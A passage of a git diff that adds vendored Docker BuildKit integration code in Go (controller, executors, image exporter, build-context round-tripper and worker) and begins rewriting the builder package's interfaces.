+	"github.com/docker/docker/builder/builder-next/adapters/containerimage"
+	"github.com/docker/docker/builder/builder-next/adapters/snapshot"
+	containerimageexp "github.com/docker/docker/builder/builder-next/exporter"
+	mobyworker "github.com/docker/docker/builder/builder-next/worker"
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/moby/buildkit/cache"
+	"github.com/moby/buildkit/cache/metadata"
+	"github.com/moby/buildkit/cache/remotecache"
+	"github.com/moby/buildkit/control"
+	"github.com/moby/buildkit/exporter"
+	"github.com/moby/buildkit/frontend"
+	"github.com/moby/buildkit/frontend/dockerfile"
+	"github.com/moby/buildkit/frontend/gateway"
+	"github.com/moby/buildkit/snapshot/blobmapping"
+	"github.com/moby/buildkit/solver/boltdbcachestorage"
+	"github.com/moby/buildkit/worker"
+	"github.com/pkg/errors"
+)
+
+func newController(rt http.RoundTripper, opt Opt) (*control.Controller, error) {
+	if err := os.MkdirAll(opt.Root, 0700); err != nil {
+		return nil, err
+	}
+
+	dist := opt.Dist
+	root := opt.Root
+
+	var driver graphdriver.Driver
+	if ls, ok := dist.LayerStore.(interface {
+		Driver() graphdriver.Driver
+	}); ok {
+		driver = ls.Driver()
+	} else {
+		return nil, errors.Errorf("could not access graphdriver")
+	}
+
+	sbase, err := snapshot.NewSnapshotter(snapshot.Opt{
+		GraphDriver: driver,
+		LayerStore:  dist.LayerStore,
+		Root:        root,
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	store, err := local.NewStore(filepath.Join(root, "content"))
+	if err != nil {
+		return nil, err
+	}
+	store = &contentStoreNoLabels{store}
+
+	md, err := metadata.NewStore(filepath.Join(root, "metadata.db"))
+	if err != nil {
+		return nil, err
+	}
+
+	snapshotter := blobmapping.NewSnapshotter(blobmapping.Opt{
+		Content:       store,
+		Snapshotter:   sbase,
+		MetadataStore: md,
+	})
+
+	cm, err := cache.NewManager(cache.ManagerOpt{
+		Snapshotter:   snapshotter,
+		MetadataStore: md,
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	src, err := containerimage.NewSource(containerimage.SourceOpt{
+		SessionManager:  opt.SessionManager,
+		CacheAccessor:   cm,
+		ContentStore:    store,
+		DownloadManager: dist.DownloadManager,
+		MetadataStore:   dist.V2MetadataService,
+		ImageStore:      dist.ImageStore,
+		ReferenceStore:  dist.ReferenceStore,
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	exec, err := newExecutor(root)
+	if err != nil {
+		return nil, err
+	}
+
+	differ, ok := sbase.(containerimageexp.Differ)
+	if !ok {
+		return nil, errors.Errorf("snapshotter doesn't support differ")
+	}
+
+	exp, err := containerimageexp.New(containerimageexp.Opt{
+		ImageStore:     dist.ImageStore,
+		ReferenceStore: dist.ReferenceStore,
+		Differ:         differ,
+	})
+	if err != nil {
+		return nil, err
+	}
+
+	cacheStorage, err := boltdbcachestorage.NewStore(filepath.Join(opt.Root, "cache.db"))
+	if err != nil {
+		return nil, err
+	}
+
+	frontends := map[string]frontend.Frontend{}
+	frontends["dockerfile.v0"] = dockerfile.NewDockerfileFrontend()
+	frontends["gateway.v0"] = gateway.NewGatewayFrontend()
+
+	wopt := mobyworker.Opt{
+		ID:                "moby",
+		SessionManager:    opt.SessionManager,
+		MetadataStore:     md,
+		ContentStore:      store,
+		CacheManager:      cm,
+		Snapshotter:       snapshotter,
+		Executor:          exec,
+		ImageSource:       src,
+		DownloadManager:   dist.DownloadManager,
+		V2MetadataService: dist.V2MetadataService,
+		Exporters: map[string]exporter.Exporter{
+			"moby": exp,
+		},
+		Transport: rt,
+	}
+
+	wc := &worker.Controller{}
+	w, err := mobyworker.NewWorker(wopt)
+	if err != nil {
+		return nil, err
+	}
+	wc.Add(w)
+
+	ci := remotecache.NewCacheImporter(remotecache.ImportOpt{
+		Worker:         w,
+		SessionManager: opt.SessionManager,
+	})
+
+	return control.NewController(control.Opt{
+		SessionManager:   opt.SessionManager,
+		WorkerController: wc,
+		Frontends:        frontends,
+		CacheKeyStorage:  cacheStorage,
+		// CacheExporter:    ce,
+		CacheImporter: ci,
+	})
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/executor_unix.go b/vendor/github.com/docker/docker/builder/builder-next/executor_unix.go
new file mode 100644
index 0000000000..da54473dd1
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/executor_unix.go
@@ -0,0 +1,17 @@
+// +build !windows
+
+package buildkit
+
+import (
+	"path/filepath"
+
+	"github.com/moby/buildkit/executor"
+	"github.com/moby/buildkit/executor/runcexecutor"
+)
+
+func newExecutor(root string) (executor.Executor, error) {
+	return runcexecutor.New(runcexecutor.Opt{
+		Root:              filepath.Join(root, "executor"),
+		CommandCandidates: []string{"docker-runc", "runc"},
+	})
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/executor_windows.go b/vendor/github.com/docker/docker/builder/builder-next/executor_windows.go
new file mode 100644
index 0000000000..7b0c6e64c8
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/executor_windows.go
@@ -0,0 +1,21 @@
+package buildkit
+
+import (
+	"context"
+	"errors"
+	"io"
+
+	"github.com/moby/buildkit/cache"
+	"github.com/moby/buildkit/executor"
+)
+
+func newExecutor(_ string) (executor.Executor, error) {
+	return &winExecutor{}, nil
+}
+
+type winExecutor struct {
+}
+
+func (e *winExecutor) Exec(ctx context.Context, meta executor.Meta, rootfs cache.Mountable, mounts []executor.Mount, stdin io.ReadCloser, stdout, stderr io.WriteCloser) error {
+	return errors.New("buildkit executor not implemented for windows")
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/exporter/export.go b/vendor/github.com/docker/docker/builder/builder-next/exporter/export.go
new file mode 100644
index 0000000000..818ff00d4e
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/exporter/export.go
@@ -0,0 +1,146 @@
+package containerimage
+
+import (
+	"context"
+	"fmt"
+	"strings"
+
+	distref "github.com/docker/distribution/reference"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/reference"
+	"github.com/moby/buildkit/cache"
+	"github.com/moby/buildkit/exporter"
+	digest "github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
+)
+
+const (
+	keyImageName        = "name"
+	exporterImageConfig = "containerimage.config"
+)
+
+// Differ can make a moby layer from a snapshot
+type Differ interface {
+	EnsureLayer(ctx context.Context, key string) ([]layer.DiffID, error)
+}
+
+// Opt defines a struct for creating new exporter
+type Opt struct {
+	ImageStore     image.Store
+	ReferenceStore reference.Store
+	Differ         Differ
+}
+
+type imageExporter struct {
+	opt Opt
+}
+
+// New creates a new moby imagestore exporter
+func New(opt Opt) (exporter.Exporter, error) {
+	im := &imageExporter{opt: opt}
+	return im, nil
+}
+
+func (e *imageExporter) Resolve(ctx context.Context, opt map[string]string) (exporter.ExporterInstance, error) {
+	i := &imageExporterInstance{imageExporter: e}
+	for k, v := range opt {
+		switch k {
+		case keyImageName:
+			for _, v := range strings.Split(v, ",") {
+				ref, err := distref.ParseNormalizedNamed(v)
+				if err != nil {
+					return nil, err
+				}
+				i.targetNames = append(i.targetNames, ref)
+			}
+		case exporterImageConfig:
+			i.config = []byte(v)
+		default:
+			logrus.Warnf("image exporter: unknown option %s", k)
+		}
+	}
+	return i, nil
+}
+
+type imageExporterInstance struct {
+	*imageExporter
+	targetNames []distref.Named
+	config      []byte
+}
+
+func (e *imageExporterInstance) Name() string {
+	return "exporting to image"
+}
+
+func (e *imageExporterInstance) Export(ctx context.Context, ref cache.ImmutableRef, opt map[string][]byte) (map[string]string, error) {
+	if config, ok := opt[exporterImageConfig]; ok {
+		e.config = config
+	}
+	config := e.config
+
+	var diffs []digest.Digest
+	if ref != nil {
+		layersDone := oneOffProgress(ctx, "exporting layers")
+
+		if err := ref.Finalize(ctx); err != nil {
+			return nil, err
+		}
+
+		diffIDs, err := e.opt.Differ.EnsureLayer(ctx, ref.ID())
+		if err != nil {
+			return nil, err
+		}
+
+		diffs = make([]digest.Digest, len(diffIDs))
+		for i := range diffIDs {
+			diffs[i] = digest.Digest(diffIDs[i])
+		}
+
+		layersDone(nil)
+	}
+
+	if len(config) == 0 {
+		var err error
+		config, err = emptyImageConfig()
+		if err != nil {
+			return nil, err
+		}
+	}
+
+	history, err := parseHistoryFromConfig(config)
+	if err != nil {
+		return nil, err
+	}
+
+	diffs, history = normalizeLayersAndHistory(diffs, history, ref)
+
+	config, err = patchImageConfig(config, diffs, history)
+	if err != nil {
+		return nil, err
+	}
+
+	configDigest := digest.FromBytes(config)
+
+	configDone := oneOffProgress(ctx, fmt.Sprintf("writing image %s", configDigest))
+	id, err := e.opt.ImageStore.Create(config)
+	if err != nil {
+		return nil, configDone(err)
+	}
+	configDone(nil)
+
+	if e.opt.ReferenceStore != nil {
+		for _, targetName := range e.targetNames {
+			tagDone := oneOffProgress(ctx, "naming to "+targetName.String())
+
+			if err := e.opt.ReferenceStore.AddTag(targetName, digest.Digest(id), true); err != nil {
+				return nil, tagDone(err)
+			}
+			tagDone(nil)
+		}
+	}
+
+	return map[string]string{
+		"containerimage.digest": id.String(),
+	}, nil
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/exporter/writer.go b/vendor/github.com/docker/docker/builder/builder-next/exporter/writer.go
new file mode 100644
index 0000000000..e8fa143fc6
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/exporter/writer.go
@@ -0,0 +1,177 @@
+package containerimage
+
+import (
+	"context"
+	"encoding/json"
+	"runtime"
+	"time"
+
+	"github.com/moby/buildkit/cache"
+	"github.com/moby/buildkit/util/progress"
+	"github.com/moby/buildkit/util/system"
+	digest "github.com/opencontainers/go-digest"
+	ocispec "github.com/opencontainers/image-spec/specs-go/v1"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+// const (
+// 	emptyGZLayer = digest.Digest("sha256:4f4fb700ef54461cfa02571ae0db9a0dc1e0cdb5577484a6d75e68dc38e8acc1")
+// )
+
+func emptyImageConfig() ([]byte, error) {
+	img := ocispec.Image{
+		Architecture: runtime.GOARCH,
+		OS:           runtime.GOOS,
+	}
+	img.RootFS.Type = "layers"
+	img.Config.WorkingDir = "/"
+	img.Config.Env = []string{"PATH=" + system.DefaultPathEnv}
+	dt, err := json.Marshal(img)
+	return dt, errors.Wrap(err, "failed to create empty image config")
+}
+
+func parseHistoryFromConfig(dt []byte) ([]ocispec.History, error) {
+	var config struct {
+		History []ocispec.History
+	}
+	if err := json.Unmarshal(dt, &config); err != nil {
+		return nil, errors.Wrap(err, "failed to unmarshal history from config")
+	}
+	return config.History, nil
+}
+
+func patchImageConfig(dt []byte, dps []digest.Digest, history []ocispec.History) ([]byte, error) {
+	m := map[string]json.RawMessage{}
+	if err := json.Unmarshal(dt, &m); err != nil {
+		return nil, errors.Wrap(err, "failed to parse image config for patch")
+	}
+
+	var rootFS ocispec.RootFS
+	rootFS.Type = "layers"
+	rootFS.DiffIDs = append(rootFS.DiffIDs, dps...)
+
+	dt, err := json.Marshal(rootFS)
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to marshal rootfs")
+	}
+	m["rootfs"] = dt
+
+	dt, err = json.Marshal(history)
+	if err != nil {
+		return nil, errors.Wrap(err, "failed to marshal history")
+	}
+	m["history"] = dt
+
+	if _, ok := m["created"]; !ok {
+		var tm *time.Time
+		for _, h := range history {
+			if h.Created != nil {
+				tm = h.Created
+			}
+		}
+		dt, err = json.Marshal(&tm)
+		if err != nil {
+			return nil, errors.Wrap(err, "failed to marshal creation time")
+		}
+		m["created"] = dt
+	}
+
+	dt, err = json.Marshal(m)
+	return dt, errors.Wrap(err, "failed to marshal config after patch")
+}
+
+func normalizeLayersAndHistory(diffs []digest.Digest, history []ocispec.History, ref cache.ImmutableRef) ([]digest.Digest, []ocispec.History) {
+	refMeta := getRefMetadata(ref, len(diffs))
+	var historyLayers int
+	for _, h := range history {
+		if !h.EmptyLayer {
+			historyLayers++
+		}
+	}
+	if historyLayers > len(diffs) {
+		// this case shouldn't happen but if it does force set history layers empty
+		// from the bottom
+		logrus.Warn("invalid image config with unaccounted layers")
+		historyCopy := make([]ocispec.History, 0, len(history))
+		var l int
+		for _, h := range history {
+			if l >= len(diffs) {
+				h.EmptyLayer = true
+			}
+			if !h.EmptyLayer {
+				l++
+			}
+			historyCopy = append(historyCopy, h)
+		}
+		history = historyCopy
+	}
+
+	if len(diffs) > historyLayers {
+		// some history items are missing. add them based on the ref metadata
+		for _, md := range refMeta[historyLayers:] {
+			history = append(history, ocispec.History{
+				Created:   &md.createdAt,
+				CreatedBy: md.description,
+				Comment:   "buildkit.exporter.image.v0",
+			})
+		}
+	}
+
+	var layerIndex int
+	for i, h := range history {
+		if !h.EmptyLayer {
+			if h.Created == nil {
+				h.Created = &refMeta[layerIndex].createdAt
+			}
+			layerIndex++
+		}
+		history[i] = h
+	}
+
+	return diffs, history
+}
+
+type refMetadata struct {
+	description string
+	createdAt   time.Time
+}
+
+func getRefMetadata(ref cache.ImmutableRef, limit int) []refMetadata {
+	if limit <= 0 {
+		return nil
+	}
+	meta := refMetadata{
+		description: "created by buildkit", // shouldn't be shown but don't fail build
+		createdAt:   time.Now(),
+	}
+	if ref == nil {
+		return append(getRefMetadata(nil, limit-1), meta)
+	}
+	if descr := cache.GetDescription(ref.Metadata()); descr != "" {
+		meta.description = descr
+	}
+	meta.createdAt = cache.GetCreatedAt(ref.Metadata())
+	p := ref.Parent()
+	if p != nil {
+		defer p.Release(context.TODO())
+	}
+	return append(getRefMetadata(p, limit-1), meta)
+}
+
+func oneOffProgress(ctx context.Context, id string) func(err error) error {
+	pw, _, _ := progress.FromContext(ctx)
+	now := time.Now()
+	st := progress.Status{
+		Started: &now,
+	}
+	pw.Write(id, st)
+	return func(err error) error {
+		// TODO: set error on status
+		now := time.Now()
+		st.Completed = &now
+		pw.Write(id, st)
+		pw.Close()
+		return err
+	}
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/reqbodyhandler.go b/vendor/github.com/docker/docker/builder/builder-next/reqbodyhandler.go
new file mode 100644
index 0000000000..48433908fb
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/reqbodyhandler.go
@@ -0,0 +1,67 @@
+package buildkit
+
+import (
+	"io"
+	"net/http"
+	"strings"
+	"sync"
+
+	"github.com/moby/buildkit/identity"
+	"github.com/pkg/errors"
+)
+
+const urlPrefix = "build-context-"
+
+type reqBodyHandler struct {
+	mu sync.Mutex
+	rt http.RoundTripper
+
+	requests map[string]io.ReadCloser
+}
+
+func newReqBodyHandler(rt http.RoundTripper) *reqBodyHandler {
+	return &reqBodyHandler{
+		rt:       rt,
+		requests: map[string]io.ReadCloser{},
+	}
+}
+
+func (h *reqBodyHandler) newRequest(rc io.ReadCloser) (string, func()) {
+	id := identity.NewID()
+	h.mu.Lock()
+	h.requests[id] = rc
+	h.mu.Unlock()
+	return "http://" + urlPrefix + id, func() {
+		h.mu.Lock()
+		delete(h.requests, id)
+		h.mu.Unlock()
+	}
+}
+
+func (h *reqBodyHandler) RoundTrip(req *http.Request) (*http.Response, error) {
+	host := req.URL.Host
+	if strings.HasPrefix(host, urlPrefix) {
+		if req.Method != "GET" {
+			return nil, errors.Errorf("invalid request")
+		}
+		id := strings.TrimPrefix(host, urlPrefix)
+		h.mu.Lock()
+		rc, ok := h.requests[id]
+		delete(h.requests, id)
+		h.mu.Unlock()
+
+		if !ok {
+			return nil, errors.Errorf("context not found")
+		}
+
+		resp := &http.Response{
+			Status:        "200 OK",
+			StatusCode:    200,
+			Body:          rc,
+			ContentLength: -1,
+		}
+
+		return resp, nil
+	}
+	return h.rt.RoundTrip(req)
+}
diff --git a/vendor/github.com/docker/docker/builder/builder-next/worker/worker.go b/vendor/github.com/docker/docker/builder/builder-next/worker/worker.go
new file mode 100644
index 0000000000..28e16368ce
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/builder-next/worker/worker.go
@@ -0,0 +1,323 @@
+package worker
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"io/ioutil"
+	nethttp "net/http"
+	"runtime"
+	"time"
+
+	"github.com/containerd/containerd/content"
+	"github.com/containerd/containerd/rootfs"
+	"github.com/docker/docker/distribution"
+	distmetadata "github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/distribution/xfer"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/layer"
+	pkgprogress "github.com/docker/docker/pkg/progress"
+	"github.com/moby/buildkit/cache"
+	"github.com/moby/buildkit/cache/metadata"
+	"github.com/moby/buildkit/client"
+	"github.com/moby/buildkit/executor"
+	"github.com/moby/buildkit/exporter"
+	"github.com/moby/buildkit/frontend"
+	"github.com/moby/buildkit/session"
+	"github.com/moby/buildkit/snapshot"
+	"github.com/moby/buildkit/solver"
+	"github.com/moby/buildkit/solver/llbsolver/ops"
+	"github.com/moby/buildkit/solver/pb"
+	"github.com/moby/buildkit/source"
+	"github.com/moby/buildkit/source/git"
+	"github.com/moby/buildkit/source/http"
+	"github.com/moby/buildkit/source/local"
+	"github.com/moby/buildkit/util/contentutil"
+	"github.com/moby/buildkit/util/progress"
+	digest "github.com/opencontainers/go-digest"
+	ocispec "github.com/opencontainers/image-spec/specs-go/v1"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
+)
+
+// Opt defines a structure for creating a worker.
+type Opt struct {
+	ID                string
+	Labels            map[string]string
+	SessionManager    *session.Manager
+	MetadataStore     *metadata.Store
+	Executor          executor.Executor
+	Snapshotter       snapshot.Snapshotter
+	ContentStore      content.Store
+	CacheManager      cache.Manager
+	ImageSource       source.Source
+	Exporters         map[string]exporter.Exporter
+	DownloadManager   distribution.RootFSDownloadManager
+	V2MetadataService distmetadata.V2MetadataService
+	Transport         nethttp.RoundTripper
+}
+
+// Worker is a local worker instance with dedicated snapshotter, cache, and so on.
+// TODO: s/Worker/OpWorker/g ?
+type Worker struct {
+	Opt
+	SourceManager *source.Manager
+}
+
+// NewWorker instantiates a local worker
+func NewWorker(opt Opt) (*Worker, error) {
+	sm, err := source.NewManager()
+	if err != nil {
+		return nil, err
+	}
+
+	cm := opt.CacheManager
+	sm.Register(opt.ImageSource)
+
+	gs, err := git.NewSource(git.Opt{
+		CacheAccessor: cm,
+		MetadataStore: opt.MetadataStore,
+	})
+	if err == nil {
+		sm.Register(gs)
+	} else {
+		logrus.Warnf("Could not register builder git source: %s", err)
+	}
+
+	hs, err := http.NewSource(http.Opt{
+		CacheAccessor: cm,
+		MetadataStore: opt.MetadataStore,
+		Transport:     opt.Transport,
+	})
+	if err == nil {
+		sm.Register(hs)
+	} else {
+		logrus.Warnf("Could not register builder http source: %s", err)
+	}
+
+	ss, err := local.NewSource(local.Opt{
+		SessionManager: opt.SessionManager,
+		CacheAccessor:  cm,
+		MetadataStore:  opt.MetadataStore,
+	})
+	if err == nil {
+		sm.Register(ss)
+	} else {
+		logrus.Warnf("Could not register builder local source: %s", err)
+	}
+
+	return &Worker{
+		Opt:           opt,
+		SourceManager: sm,
+	}, nil
+}
+
+// ID returns worker ID
+func (w *Worker) ID() string {
+	return w.Opt.ID
+}
+
+// Labels returns map of all worker labels
+func (w *Worker) Labels() map[string]string {
+	return w.Opt.Labels
+}
+
+// LoadRef loads a reference by ID
+func (w *Worker) LoadRef(id string) (cache.ImmutableRef, error) {
+	return w.CacheManager.Get(context.TODO(), id)
+}
+
+// ResolveOp converts a LLB vertex into a LLB operation
+func (w *Worker) ResolveOp(v solver.Vertex, s frontend.FrontendLLBBridge) (solver.Op, error) {
+	switch op := v.Sys().(type) {
+	case *pb.Op_Source:
+		return ops.NewSourceOp(v, op, w.SourceManager, w)
+	case *pb.Op_Exec:
+		return ops.NewExecOp(v, op, w.CacheManager, w.MetadataStore, w.Executor, w)
+	case *pb.Op_Build:
+		return ops.NewBuildOp(v, op, s, w)
+	default:
+		return nil, errors.Errorf("could not resolve %v", v)
+	}
+}
+
+// ResolveImageConfig returns image config for an image
+func (w *Worker) ResolveImageConfig(ctx context.Context, ref string) (digest.Digest, []byte, error) {
+	// ImageSource is typically source/containerimage
+	resolveImageConfig, ok := w.ImageSource.(resolveImageConfig)
+	if !ok {
+		return "", nil, errors.Errorf("worker %q does not implement ResolveImageConfig", w.ID())
+	}
+	return resolveImageConfig.ResolveImageConfig(ctx, ref)
+}
+
+// Exec executes a process directly on a worker
+func (w *Worker) Exec(ctx context.Context, meta executor.Meta, rootFS cache.ImmutableRef, stdin io.ReadCloser, stdout, stderr io.WriteCloser) error {
+	active, err := w.CacheManager.New(ctx, rootFS)
+	if err != nil {
+		return err
+	}
+	defer active.Release(context.TODO())
+	return w.Executor.Exec(ctx, meta, active, nil, stdin, stdout, stderr)
+}
+
+// DiskUsage returns disk usage report
+func (w *Worker) DiskUsage(ctx context.Context, opt client.DiskUsageInfo) ([]*client.UsageInfo, error) {
+	return w.CacheManager.DiskUsage(ctx, opt)
+}
+
+// Prune deletes reclaimable build cache
+func (w *Worker) Prune(ctx context.Context, ch chan client.UsageInfo) error {
+	return w.CacheManager.Prune(ctx, ch)
+}
+
+// Exporter returns exporter by name
+func (w *Worker) Exporter(name string) (exporter.Exporter, error) {
+	exp, ok := w.Exporters[name]
+	if !ok {
+		return nil, errors.Errorf("exporter %q could not be found", name)
+	}
+	return exp, nil
+}
+
+// GetRemote returns a remote snapshot reference for a local one
+func (w *Worker) GetRemote(ctx context.Context, ref cache.ImmutableRef, createIfNeeded bool) (*solver.Remote, error) {
+	return nil, errors.Errorf("getremote not implemented")
+}
+
+// FromRemote converts a remote snapshot reference to a local one
+func (w *Worker) FromRemote(ctx context.Context, remote *solver.Remote) (cache.ImmutableRef, error) {
+	rootfs, err := getLayers(ctx, remote.Descriptors)
+	if err != nil {
+		return nil, err
+	}
+
+	layers := make([]xfer.DownloadDescriptor, 0, len(rootfs))
+
+	for _, l := range rootfs {
+		// ongoing.add(desc)
+		layers = append(layers, &layerDescriptor{
+			desc:     l.Blob,
+			diffID:   layer.DiffID(l.Diff.Digest),
+			provider: remote.Provider,
+			w:        w,
+			pctx:     ctx,
+		})
+	}
+
+	defer func() {
+		for _, l := range rootfs {
+			w.ContentStore.Delete(context.TODO(), l.Blob.Digest)
+		}
+	}()
+
+	r := image.NewRootFS()
+	rootFS, release, err := w.DownloadManager.Download(ctx, *r, runtime.GOOS, layers, &discardProgress{})
+	if err != nil {
+		return nil, err
+	}
+	defer release()
+
+	ref, err := w.CacheManager.GetFromSnapshotter(ctx, string(rootFS.ChainID()), cache.WithDescription(fmt.Sprintf("imported %s", remote.Descriptors[len(remote.Descriptors)-1].Digest)))
+	if err != nil {
+		return nil, err
+	}
+	return ref, nil
+}
+
+type discardProgress struct{}
+
+func (*discardProgress) WriteProgress(_ pkgprogress.Progress) error {
+	return nil
+}
+
+// Fetch(ctx context.Context, desc ocispec.Descriptor) (io.ReadCloser, error)
+type layerDescriptor struct {
+	provider content.Provider
+	desc     ocispec.Descriptor
+	diffID   layer.DiffID
+	// ref      ctdreference.Spec
+	w    *Worker
+	pctx context.Context
+}
+
+func (ld *layerDescriptor) Key() string {
+	return "v2:" + ld.desc.Digest.String()
+}
+
+func (ld *layerDescriptor) ID() string {
+	return ld.desc.Digest.String()
+}
+
+func (ld *layerDescriptor) DiffID() (layer.DiffID, error) {
+	return ld.diffID, nil
+}
+
+func (ld *layerDescriptor) Download(ctx context.Context, progressOutput pkgprogress.Output) (io.ReadCloser, int64, error) {
+	done := oneOffProgress(ld.pctx, fmt.Sprintf("pulling %s", ld.desc.Digest))
+	if err := contentutil.Copy(ctx, ld.w.ContentStore, ld.provider, ld.desc); err != nil {
+		return nil, 0, done(err)
+	}
+	done(nil)
+
+	ra, err := ld.w.ContentStore.ReaderAt(ctx, ld.desc)
+	if err != nil {
+		return nil, 0, err
+	}
+
+	return ioutil.NopCloser(content.NewReader(ra)), ld.desc.Size, nil
+}
+
+func (ld *layerDescriptor) Close() {
+	// ld.is.ContentStore.Delete(context.TODO(), ld.desc.Digest)
+}
+
+func (ld *layerDescriptor) Registered(diffID layer.DiffID) {
+	// Cache mapping from this layer's DiffID to the blobsum
+	ld.w.V2MetadataService.Add(diffID, distmetadata.V2Metadata{Digest: ld.desc.Digest})
+}
+
+func getLayers(ctx context.Context, descs []ocispec.Descriptor) ([]rootfs.Layer, error) {
+	layers := make([]rootfs.Layer, len(descs))
+	for i, desc := range descs {
+		diffIDStr := desc.Annotations["containerd.io/uncompressed"]
+		if diffIDStr == "" {
+			return nil, errors.Errorf("%s missing uncompressed digest", desc.Digest)
+		}
+		diffID, err := digest.Parse(diffIDStr)
+		if err != nil {
+			return nil, err
+		}
+		layers[i].Diff = ocispec.Descriptor{
+			MediaType: ocispec.MediaTypeImageLayer,
+			Digest:    diffID,
+		}
+		layers[i].Blob = ocispec.Descriptor{
+			MediaType: desc.MediaType,
+			Digest:    desc.Digest,
+			Size:      desc.Size,
+		}
+	}
+	return layers, nil
+}
+
+func oneOffProgress(ctx context.Context, id string) func(err error) error {
+	pw, _, _ := progress.FromContext(ctx)
+	now := time.Now()
+	st := progress.Status{
+		Started: &now,
+	}
+	pw.Write(id, st)
+	return func(err error) error {
+		// TODO: set error on status
+		now := time.Now()
+		st.Completed = &now
+		pw.Write(id, st)
+		pw.Close()
+		return err
+	}
+}
+
+type resolveImageConfig interface {
+	ResolveImageConfig(ctx context.Context, ref string) (digest.Digest, []byte, error)
+}
diff --git a/vendor/github.com/docker/docker/builder/builder.go b/vendor/github.com/docker/docker/builder/builder.go
index ced19e81e6..3eb0341417 100644
--- a/vendor/github.com/docker/docker/builder/builder.go
+++ b/vendor/github.com/docker/docker/builder/builder.go
@@ -2,156 +2,80 @@
 //
 // Historically, only server-side Dockerfile interpreters existed.
 // This package allows for other implementations of Docker builders.
-package builder
+package builder // import "github.com/docker/docker/builder"
 
 import (
+	"context"
 	"io"
-	"os"
-	"time"
 
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/backend"
 	"github.com/docker/docker/api/types/container"
+	containerpkg "github.com/docker/docker/container"
 	"github.com/docker/docker/image"
-	"github.com/docker/docker/reference"
-	"golang.org/x/net/context"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/containerfs"
 )
 
 const (
 	// DefaultDockerfileName is the Default filename with Docker commands, read by docker build
-	DefaultDockerfileName string = "Dockerfile"
+	DefaultDockerfileName = "Dockerfile"
 )
 
-// Context represents a file system tree.
-type Context interface {
+// Source defines a location that can be used as a source for the ADD/COPY
+// instructions in the builder.
+type Source interface {
+	// Root returns root path for accessing source
+	Root() containerfs.ContainerFS
 	// Close allows to signal that the filesystem tree won't be used anymore.
 	// For Context implementations using a temporary directory, it is recommended to
 	// delete the temporary directory in Close().
 	Close() error
-	// Stat returns an entry corresponding to path if any.
-	// It is recommended to return an error if path was not found.
-	// If path is a symlink it also returns the path to the target file.
-	Stat(path string) (string, FileInfo, error)
-	// Open opens path from the context and returns a readable stream of it.
-	Open(path string) (io.ReadCloser, error)
-	// Walk walks the tree of the context with the function passed to it.
-	Walk(root string, walkFn WalkFunc) error
+	// Hash returns a checksum for a file
+	Hash(path string) (string, error)
 }
 
-// WalkFunc is the type of the function called for each file or directory visited by Context.Walk().
-type WalkFunc func(path string, fi FileInfo, err error) error
-
-// ModifiableContext represents a modifiable Context.
-// TODO: remove this interface once we can get rid of Remove()
-type ModifiableContext interface {
-	Context
-	// Remove deletes the entry specified by `path`.
-	// It is usual for directory entries to delete all its subentries.
-	Remove(path string) error
-}
-
-// FileInfo extends os.FileInfo to allow retrieving an absolute path to the file.
-// TODO: remove this interface once pkg/archive exposes a walk function that Context can use.
-type FileInfo interface {
-	os.FileInfo
-	Path() string
-}
-
-// PathFileInfo is a convenience struct that implements the FileInfo interface.
-type PathFileInfo struct {
-	os.FileInfo
-	// FilePath holds the absolute path to the file.
-	FilePath string
-	// Name holds the basename for the file.
-	FileName string
-}
-
-// Path returns the absolute path to the file.
-func (fi PathFileInfo) Path() string {
-	return fi.FilePath
-}
-
-// Name returns the basename of the file.
-func (fi PathFileInfo) Name() string {
-	if fi.FileName != "" {
-		return fi.FileName
-	}
-	return fi.FileInfo.Name()
-}
+// Backend abstracts calls to a Docker Daemon.
+type Backend interface {
+	ImageBackend
+	ExecBackend
 
-// Hashed defines an extra method intended for implementations of os.FileInfo.
-type Hashed interface {
-	// Hash returns the hash of a file.
-	Hash() string
-	SetHash(string)
-}
+	// CommitBuildStep creates a new Docker image from the config generated by
+	// a build step.
+	CommitBuildStep(backend.CommitConfig) (image.ID, error)
+	// ContainerCreateWorkdir creates the workdir
+	ContainerCreateWorkdir(containerID string) error
 
-// HashedFileInfo is a convenient struct that augments FileInfo with a field.
-type HashedFileInfo struct {
-	FileInfo
-	// FileHash represents the hash of a file.
-	FileHash string
-}
+	CreateImage(config []byte, parent string) (Image, error)
 
-// Hash returns the hash of a file.
-func (fi HashedFileInfo) Hash() string {
-	return fi.FileHash
+	ImageCacheBuilder
 }
 
-// SetHash sets the hash of a file.
-func (fi *HashedFileInfo) SetHash(h string) {
-	fi.FileHash = h
+// ImageBackend are the interface methods required from an image component
+type ImageBackend interface {
+	GetImageAndReleasableLayer(ctx context.Context, refOrID string, opts backend.GetImageAndLayerOptions) (Image, ROLayer, error)
 }
 
-// Backend abstracts calls to a Docker Daemon.
-type Backend interface {
-	// TODO: use digest reference instead of name
-
-	// GetImageOnBuild looks up a Docker image referenced by `name`.
-	GetImageOnBuild(name string) (Image, error)
-	// TagImage tags an image with newTag
-	TagImageWithReference(image.ID, reference.Named) error
-	// PullOnBuild tells Docker to pull image referenced by `name`.
-	PullOnBuild(ctx context.Context, name string, authConfigs map[string]types.AuthConfig, output io.Writer) (Image, error)
